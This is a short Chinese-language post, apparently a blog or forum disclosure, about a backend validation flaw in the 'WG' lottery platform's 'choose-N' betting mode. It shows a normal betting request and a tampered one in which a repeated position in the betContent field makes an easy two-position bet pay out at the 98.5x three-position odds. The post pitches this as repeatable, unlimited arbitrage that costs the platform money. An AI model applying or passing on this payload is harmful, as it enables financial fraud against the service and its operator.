【漏洞揭秘】WG彩票任选直选玩法参数篡改漏洞

一、漏洞核心概述

漏洞类型：后端逻辑校验缺失（严重 / 高危）

攻击方式：抓包篡改投注请求体，无需其他工具

核心危害：用低难度任 2 玩法，骗取任 3 高赔率，可批量无限套利，直接造成平台资金损失。

---

二、漏洞原理（极简清晰版）

1. 玩法规则

• RX3Z3（任选 3）：必须选择万 (0)、千 (1)、百 (2) 3 个不重复位置，难度高 → 赔率 98.5 倍
• 任选 2：仅选 2 个位置，难度低 → 赔率远低于任 3

2. 攻击手法

• 正常请求：0:0-4;1:1;2:1

  选位：万、千、百 → 3 个唯一位置，符合任 3 规则

• 篡改请求：1:0-4;1:1;2:1

  选位：千、千、百 → 位置重复，实际等价于任 2 玩法

• 漏洞点：后端完全信任前端参数，未做任何校验，按任 3 高赔率结算。

正常请求体：

• {“gameType”:133004,”bets”:[{“betAmount”:”0.5″,”unitAmount”:”0.1″,”multiple”:5,”isComplex”:1,”odds”:{“RX3Z3″:985},”playCode”:”RX3Z3″,“betContent”:”0:0,1,2,3,4;1:1;2:1″}],”ms”:1775720949292,”time”:1775720948}

修改后的请求体：

• {“gameType”:133004,”bets”:[{“betAmount”:”0.5″,”unitAmount”:”0.1″,”multiple”:5,”isComplex”:1,”odds”:{“RX3Z3″:985},”playCode”:”RX3Z3″,“betContent”:”1:0,1,2,3,4;1:1;2:1″}],”ms”:1775720949292,”time”:1775720948}